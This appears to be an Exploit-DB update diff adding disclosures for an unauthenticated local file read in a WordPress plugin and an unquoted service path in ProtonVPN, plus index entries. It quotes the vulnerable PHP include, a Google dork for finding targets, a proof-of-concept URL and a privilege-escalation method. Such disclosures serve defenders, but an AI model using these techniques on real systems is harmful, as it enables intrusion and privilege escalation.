DB: 2022-03-24

3 changes to exploits/shellcodes

ProtonVPN 1.26.0 - Unquoted Service Path

WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated

Author: Offensive Security

exploits/multiple/remote/50833.txt

@@ -4,7 +4,7 @@
 # Vendor Homepage: https://www.ivanti.com/
 # Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6
 # Version: CSA 4.6 4.5 - EOF Aug 2021
-# Tested on: Linux x86_64 # CVE : CVE-2021-44529
+# Tested on: Linux x86_64
 # CVE : CVE-2021-44529
 
 ###

exploits/php/webapps/50838.txt

@@ -0,0 +1,27 @@
+# Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated
+# Google Dork: inurl:/wp-content/plugins/amministrazione-aperta/
+# Date: 23-03-2022
+# Exploit Author: Hassan Khan Yusufzai - Splint3r7
+# Vendor Homepage: https://wordpress.org/plugins/amministrazione-aperta/
+# Version: 3.7.3
+# Tested on: Firefox
+
+# Vulnerable File: dispatcher.php
+
+# Vulnerable Code:
+
+```
+if ( isset($_GET['open']) ) {
+    include(ABSPATH . 'wp-content/plugins/'.$_GET['open']);
+} else {
+    echo '
+        <div id="welcome-panel" class="welcome-panel"
+style="padding-bottom: 20px;">
+                <div class="welcome-panel-column-container">';
+
+    include_once( ABSPATH . WPINC . '/feed.php' );
+```
+
+# Proof of Concept:
+
+localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]

exploits/windows/local/50837.txt

@@ -0,0 +1,29 @@
+# Exploit Title: ProtonVPN 1.26.0 - Unquoted Service Path
+# Date: 22/03/2022
+# Exploit Author: gemreda (@gemredax)
+# Vendor Homepage: https://protonvpn.com/
+# Software Link: https://protonvpn.com/
+# Version: 1.26.0
+# Tested: Windows 10 x64
+# Contact: gemredax@pm.me
+
+PS C:\Users\Emre> sc.exe qc "ProtonVPN Wireguard"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ProtonVPN Wireguard
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 3   DEMAND_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.WireGuardService.exe C:\ProgramData\ProtonVPN\WireGuard\ProtonVPN.conf
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : ProtonVPN WireGuard
+        DEPENDENCIES       : Nsi
+                           : TcpIp
+        SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+
+The product uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path.
+If a malicious individual has access to the file system, it is possible to elevate privileges by inserting such a file as "C:\Program.exe" to be run by a privileged program making use of WinExec.

files_exploits.csv

@@ -11473,6 +11473,7 @@ id,file,description,date,author,type,platform,port
 50819,exploits/windows/local/50819.txt,"Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
 50824,exploits/windows/local/50824.txt,"VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path",1970-01-01,"Faisal Alasmari",local,windows,
 50834,exploits/windows/local/50834.txt,"Sysax FTP Automation 6.9.0 - Privilege Escalation",1970-01-01,bzyo,local,windows,
+50837,exploits/windows/local/50837.txt,"ProtonVPN 1.26.0 - Unquoted Service Path",1970-01-01,gemreda,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44904,3 +44905,4 @@ id,file,description,date,author,type,platform,port
 50831,exploits/php/webapps/50831.txt,"ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover",1970-01-01,"Devansh Bordia",webapps,php,
 50828,exploits/php/webapps/50828.sh,"Tiny File Manager 2.4.6 - Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",webapps,php,
 50830,exploits/php/webapps/50830.txt,"Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
+50838,exploits/php/webapps/50838.txt,"WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated",1970-01-01,"Hassan Khan Yusufzai",webapps,php,